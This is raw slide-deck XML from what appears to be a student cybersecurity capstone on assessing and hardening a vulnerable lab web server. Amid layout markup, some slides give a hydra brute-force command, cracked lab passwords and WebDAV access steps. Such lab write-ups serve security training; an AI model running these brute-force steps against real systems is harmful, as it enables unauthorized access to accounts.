          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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8" name="Google Shape;948;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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49" name="Google Shape;949;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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0" name="Google Shape;950;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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1" name="Google Shape;951;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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6. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="953" name="Shape 9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4" name="Google Shape;954;p4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55" name="Google Shape;955;p47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956" name="Google Shape;956;p47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7" name="Google Shape;957;p4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58" name="Google Shape;958;p47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9" name="Google Shape;959;p4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0" name="Google Shape;960;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003925" y="3873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1" name="Google Shape;961;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="38730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2" name="Google Shape;962;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003800" y="43111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3" name="Google Shape;963;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="43112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4" name="Google Shape;964;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003875" y="299662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5" name="Google Shape;965;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-150" y="299675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6" name="Google Shape;966;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003750" y="34347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p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="343487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68" name="Google Shape;968;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003900" y="213525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9" name="Google Shape;969;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24725" y="2135375"/>
            <a:ext cx="91440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0" name="Google Shape;970;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="25733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1" name="Google Shape;971;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25735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2" name="Google Shape;972;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1258875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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000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74" name="Google Shape;974;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003775" y="1697000"/>
            <a:ext cx="7866300" cy="3771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5" name="Google Shape;975;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="9144000" cy="3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243575" spcFirstLastPara="1" rIns="457200" wrap="square" tIns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76" name="Google Shape;976;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="126187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47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709928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47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2129247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79" name="Google Shape;979;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2577303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0" name="Google Shape;980;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2999232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47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3438144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2" name="Google Shape;982;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3877056"/>
            <a:ext cx="475488" cy="36137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3" name="Google Shape;983;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4314663"/>
            <a:ext cx="475488" cy="3613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8">
          <p15:clr>
            <a:srgbClr val="F9AD4C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7. Fist to Five">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1_1_1"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5" name="Google Shape;985;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="59" l="0" r="0" t="59"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986" name="Google Shape;986;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="3307075"/>
            <a:ext cx="8595300" cy="156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000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto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87" name="Google Shape;987;p4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88" name="Google Shape;988;p4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89" name="Google Shape;98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7549" y="769725"/>
            <a:ext cx="7488902" cy="18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990" name="Google Shape;990;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202525" y="2754341"/>
            <a:ext cx="85953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Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="24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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="991" name="Google Shape;991;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="3307075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8. Review">
  <p:cSld name="CUSTOM_17_2_1_2_1"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" name="Google Shape;993;p49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4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95" name="Google Shape;995;p49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996" name="Google Shape;996;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="28807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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="36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997" name="Google Shape;99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0959" y="1143000"/>
            <a:ext cx="1222082" cy="1638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9. Take a Break 1">
  <p:cSld name="CUSTOM"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Google Shape;999;p5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0" name="Google Shape;1000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. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1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oogle Shape;48;p6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0" name="Google Shape;50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" name="Google Shape;51;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="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0. Take a Break 2">
  <p:cSld name="CUSTOM_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1001" name="Shape 10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2" name="Google Shape;1002;p5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03" name="Google Shape;1003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397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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="411400"/>
            <a:ext cx="9144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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="48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005" name="Google Shape;1005;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305500" y="1468500"/>
            <a:ext cx="4533000" cy="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7. The End">
  <p:cSld name="CUSTOM_7">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1006" name="Shape 10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7" name="Google Shape;1007;p52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52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09" name="Google Shape;1009;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010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599" y="496138"/>
            <a:ext cx="5046801" cy="415122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1. Take a Break 1">
  <p:cSld name="CUSTOM_9"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53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013" name="Google Shape;1013;p5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42900" y="-24125"/>
            <a:ext cx="9229800" cy="519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. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2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7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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100" y="2088475"/>
            <a:ext cx="8595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56" name="Google Shape;56;p7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" name="Google Shape;57;p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. Text Only">
  <p:cSld name="CUSTOM_2_7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0" name="Google Shape;60;p8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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p8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Google Shape;62;p8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63" name="Google Shape;63;p8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" name="Google Shape;64;p8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5" name="Google Shape;65;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="358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. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="119" l="0" r="0" t="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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457200" spcFirstLastPara="1" rIns="457200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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="389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400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0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spcBef>
                <a:spcPts val="8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spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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0" name="Google Shape;70;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="DBD9E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82875" lIns="182875" spcFirstLastPara="1" rIns="182875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0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1" name="Google Shape;71;p9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457200" spcFirstLastPara="1" rIns="274300" wrap="square" tIns="18287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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto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2" name="Google Shape;72;p9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73" name="Google Shape;73;p9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906455"/>
            <a:ext cx="8595600" cy="10200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="A9B7C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9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274375" y="640080"/>
            <a:ext cx="8595600" cy="10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5" name="Google Shape;75;p9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. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="24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79" name="Google Shape;79;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="139" r="149" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="200253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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000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1" name="Google Shape;81;p10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274300" spcFirstLastPara="1" rIns="0" wrap="square" tIns="4570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7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theme" Target="../theme/theme2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</p:sldLayoutIdLst>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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3.png"/><Relationship Id="rId4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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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1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7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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1532325"/>
            <a:ext cx="8595300" cy="96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Capstone Engagement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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="3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9" name="Google Shape;1019;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727075" y="3684350"/>
            <a:ext cx="7971900" cy="7197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By: Louvain Lakasi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February 14,2022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63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Vulnerability of insecure open port 80 ( apache)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;1119;p63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0" name="Google Shape;1120;p63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63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access the folders and navigation in the capstone machine by typing the IP address of webserver 192.168.1.105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while browsing the server, I came across information that caught my attention in the meet_our_team/ashton.txt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company_folder/secret_folder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22" name="Google Shape;1122;p63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23" name="Google Shape;1123;p63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4" name="Google Shape;1124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5" name="Google Shape;1125;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190906" y="1276688"/>
            <a:ext cx="3435242" cy="2019289"/>
            <a:chOff x="-3503752" y="1885638"/>
            <a:chExt cx="4478804" cy="2632367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126" name="Google Shape;1126;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3503752" y="389670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27" name="Google Shape;1127;p63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28" name="Google Shape;1128;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295631" y="800853"/>
            <a:ext cx="533372" cy="476599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03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129" name="Google Shape;1129;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5929700" y="1277450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0" name="Google Shape;1130;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454375" y="17316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31" name="Google Shape;1131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307" y="731525"/>
            <a:ext cx="4459218" cy="315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2" name="Google Shape;1132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9025" y="2525700"/>
            <a:ext cx="3674451" cy="22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p6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Brute-force Attack 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p64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9" name="Google Shape;1139;p64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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614575" y="148057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hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get company_folder/secret_folder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 cracked ashton’s password=leopoldo, I discovered the way to access webdav and I have the hash of Ryan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1" name="Google Shape;1141;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3376150" y="780050"/>
            <a:ext cx="5583600" cy="39318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42" name="Google Shape;1142;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="125831" y="891965"/>
            <a:ext cx="663480" cy="505042"/>
            <a:chOff x="110019" y="1415884"/>
            <a:chExt cx="865032" cy="658379"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Google Shape;1143;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="110019" y="1415884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44" name="Google Shape;1144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45" name="Google Shape;1145;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190875" y="2790825"/>
            <a:ext cx="533400" cy="585300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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02</a:t>
            </a:r>
            <a:endParaRPr sz="21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46" name="Google Shape;114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775" y="780050"/>
            <a:ext cx="6008025" cy="138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7" name="Google Shape;114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63925" y="2335100"/>
            <a:ext cx="5939874" cy="22996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48" name="Google Shape;1148;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2562406" y="665228"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1149" name="Google Shape;1149;p64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50" name="Google Shape;1150;p64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4" name="Shape 1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5" name="Google Shape;1155;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute-force Attack 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p6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p65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8" name="Google Shape;1158;p65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Crackstation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Copy /paste Ryan’s Hash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Found Ryan’s password +linux4u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 Access webdav server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: dav://192.168.1.105/webdav/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59" name="Google Shape;1159;p65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60" name="Google Shape;1160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1" name="Google Shape;1161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p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190906" y="2374878"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1163" name="Google Shape;1163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4" name="Google Shape;1164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5" name="Google Shape;1165;p65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66" name="Google Shape;1166;p6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67" name="Google Shape;1167;p65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8" name="Google Shape;1168;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
